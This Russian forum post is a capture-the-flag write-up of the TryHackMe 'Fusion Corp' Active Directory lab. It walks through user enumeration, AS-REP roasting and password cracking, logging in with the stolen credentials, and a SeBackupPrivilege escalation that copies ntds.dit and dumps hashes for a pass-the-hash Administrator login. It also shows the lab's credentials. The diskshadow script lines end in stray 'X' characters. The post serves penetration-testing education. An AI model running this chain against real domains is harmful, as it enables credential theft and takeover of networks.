ANTICHAT - Fusion Corp или очередной Active Directory! TryHackMe Windows

https://forum.antichat.xyz/attachmen...7df30e165f.png

Привет форум!
Предисловие
Давно мы с вами не виделись! На этот раз попробуем другую площадку, известную для всех новичков - TryHackMe!
В этой лаборатории мы разберём Hard машину под названием - Fusion Corp, найдем способ получить пользовательские хэши и неменее интересный способ повышения привилегий до Администратора через групповые привилегии!
Приступим!
Данные
Задача: Скомпрометировать машину на Windows (Active Directory) и забрать два флага user.txt и root.txt.
Основная рабочая машина: Kali Linux 2022.1
IP адрес удаленной машины - 10.10.218.247
IP адрес основной машины - 10.8.57.55
Начальная разведка и сканирование портов
Запустим Nmap с параметрами -sC и -sV для сканирования нашего хоста:

Код:

nmap -sC -sV 10.10.125.118

https://forum.antichat.xyz/attachmen...0659478931.png

Видим доменное имя - fusion.corp, добавим его в /etc/hosts.
Из интересных портов и служб на них можем приметить сразу несколько:

80/tcp - HTTP - (Microsoft IIS httpd 10.0)
88/tcp - Kerberos (Можно попробовать метод kerberoasting для найденных пользователей)
445/tcp - Samba - (Enum4linux в помощь и перебор сетевых шар)
3268/tcp - LDAP - (Есть вариант провести его разведку)
3389/tcp - RDP - (Вход на удаленный рабочий стол)

Пойдем более лёгким путем, для начала попробуем собрать пользователей и попробуем реализовать атаку на AS_REP кербероса.
Попробуем использовать уже известную нам утилиту - Enum4linux для сбора информации о машине.

Код:

enum4linux -a 10.10.125.118

https://forum.antichat.xyz/attachmen...0666401597.png

Но к сожалению, наш инструмент не смог справиться из-за недостатка привилегий на сервере.
Тогда как мы знаем что у нас открыт 80 порт - HTTP, зайдем на веб-сервер и посмотрим интересную информацию уже там!

https://forum.antichat.xyz/attachmen...0666429544.png

Нас встречает довольно красивый по дизайну сайт, спустимся ниже...
И здесь мы найдем сотрудников этой корпорации.

https://forum.antichat.xyz/attachmen...0666446722.png

Конечно мы можем записать их в файл, а потом сгенерировать из них словарь для брута, но поищем что-нибудь поинтереснее, допустим - директории и файлы на сервере)
Запустим наш - Dirsearch и посмотрим его вывод.

Код:

dirsearch -e php,log,sql,txt,bak,tar,tar.gz,zip,rar,swp,gz,asp,aspx -t 50 -u http://10.10.125.118/

https://forum.antichat.xyz/attachmen...0659412268.png

И сразу же видим директорию - /backup/
Давайте перейдем туда и посмотрим какие файлы содержит эта папка...

https://forum.antichat.xyz/attachmen...0659607507.png

Здесь лежит файл, а скорее таблица с пользователями (сотрудниками) этой компании, давайте скачаем его и посмотрим его содержимое.

https://forum.antichat.xyz/attachmen...0660014175.png

Здесь мы видим список пользователей и их никнеймы, теперь давайте скопируем их ники в файл и проверим их валидность в kerbrute.

Код:

./kerbrute userenum -d fusion.corp --dc fusion.corp users.txt

https://forum.antichat.xyz/attachmen...0660164872.png

Здесь мы видим только одного пользователя - Larry Parker (lparker)
Получение доступа к пользователям
Теперь нам стоит проверить его на уязвимость, подставим файл с пользователями в модуль impacket'а - GetNPUsers:

Код:

impacket-GetNPUsers fusion.corp/ -dc-ip 10.10.125.118 -usersfile users.txt

https://forum.antichat.xyz/attachmen...0660385616.png

Есть! Мы получили хэш-пароль пользователя - lparker.
Сохраняем его в файл и брутим с помощью - JohnTheRipper.

https://forum.antichat.xyz/attachmen...0660559253.png

Спустя считанные секунды мы получили его креды - lparker:!!abbylvzsvs2k6!
Попробуем зайти через Evil-WinRM на машину нашего пользователя...

Код:

evil-winrm -i 10.10.125.118 -u lparker -p '!!abbylvzsvs2k6!'

https://forum.antichat.xyz/attachmen...0660892979.png

Есть! Мы в системе!
Получение Администратора

Далее наши шаги могли бы начинаться с чего-то более простого, например загрузки сюда WinPeas или открытие Meterpreter сессии для последующей подгрузки модулей...
Но для начала проверим более простые способы, может пароль скрывается в информации

Код:

net user

или наш пользователь добавлен в интересные для наших целей группы.
Давайте-же проверим

Код:

net users

https://forum.antichat.xyz/attachmen...0661159275.png

Код:

net user Administrator

https://forum.antichat.xyz/attachmen...0661195535.png

И только как я "напал" net user'ом на пользователя - jmurphy, я получил его пароль в комментарии к его аккаунту.

Код:

net user jmurphy

https://forum.antichat.xyz/attachmen...0661507818.png

Итак, мы нашли ещё одни креды - jmurphy:u8WC3!kLsgw=#bRY.
Теперь зайдем уже на него с Evil-WinRM.

Код:

evil-winrm -i 10.10.125.118 -u jmurphy -p 'u8WC3!kLsgw=#bRY'

https://forum.antichat.xyz/attachmen...0661751644.png

Получилось! Мы jmurphy! Заберем наш флаг в C:\Users\jmurphy\Desktop\flag.txt

https://forum.antichat.xyz/attachmen...0662467765.png

Далее стоит проверить наши права и локальные группы в которых мы состоим, в этом нам поможет команда

Код:

whoami

, а именно её аргумент

Код:

/all

.

https://forum.antichat.xyz/attachmen...0662043731.png

Среди этого большого куска информации, мы можем обнаружить привилегию на создание системных бэкапов - SeBackupPrivilege.
Немного погуглив я наткнулся на статью - в которой говорится про повышение прав из-за этой привилегии.
Давайте попробуем реализовать это на нашей машине
Я буду использовать - Метод №1 - Disk Shadow+ Robocopy.
Вкратце про него можно сказать так, Disk Shadow создает бэкап на отдельный диск и скачивает туда базу - ntds.dit.

Далее Robocopy копирует её, а после можно скачать себе на локальную машину. Приступим!

Первое что нужно сделать, это создать скрипт на своей машине, чтобы Disk Shadow выполнил его, содержимое скрипта -

Код:

back_script.txt

:

Код:

Код:

set verbose onX

set metadata C:\Windows\Temp\meta.cabX

set context clientaccessibleX

set context persistentX

begin backupX

add volume C: alias cdriveX

createX

expose %cdrive% E:X

end backupX

Далее скачиваем его на нашу уязвимую машину, с помощью встроенной функции Evil-WinRM'а -

Код:

upload

Код:

upload back_script.txt

https://forum.antichat.xyz/attachmen...0663899043.png

Далее запускаем скрипт:

Код:

diskshadow /s back_script.txt

https://forum.antichat.xyz/attachmen...0664010173.png

Бэкап был успешно создан и перемещен на диск E:\
Теперьс папки

Код:

C:\Windows\Temp

скопируем базу ntds.dit.

Код:

robocopy /b E:\Windows\ntds . ntds.dit

https://forum.antichat.xyz/attachmen...0664484287.png

Далее сохраняем его в реестре:

Код:

reg save hklm\system C:\Windows\temp\system

https://forum.antichat.xyz/attachmen...0664566712.png

Теперь смотрим файлы и видим два заветных файла:

https://forum.antichat.xyz/attachmen...0664640293.png

Скачиваем их через фичу от Evil-WinRM под названием -

Код:

download

https://forum.antichat.xyz/attachmen...0664844737.png

Далее после скачивания, мы можем достать хэши паролей пользователей с помощью impacket-secretsdump:

Код:

impacket-secretsdump -ntds ntds.dit -system system LOCAL

https://forum.antichat.xyz/attachmen...0665699642.png

Ура! Мы смогли достать хэш-пароль Администратора, теперь нам осталось подставить его в аргумент

Код:

-H

у Evil-WinRM и зайти в админа:

Код:

evil-winrm -i 10.10.218.247 -u Administrator -H '9653b02d945329c7270525c4c2a69c67'

https://forum.antichat.xyz/attachmen...0666027761.png

Огромнейшее спасибо, дорогой читатель что смог досмотреть эту статью до конца, надеюсь что вам понравилось. Скоро буду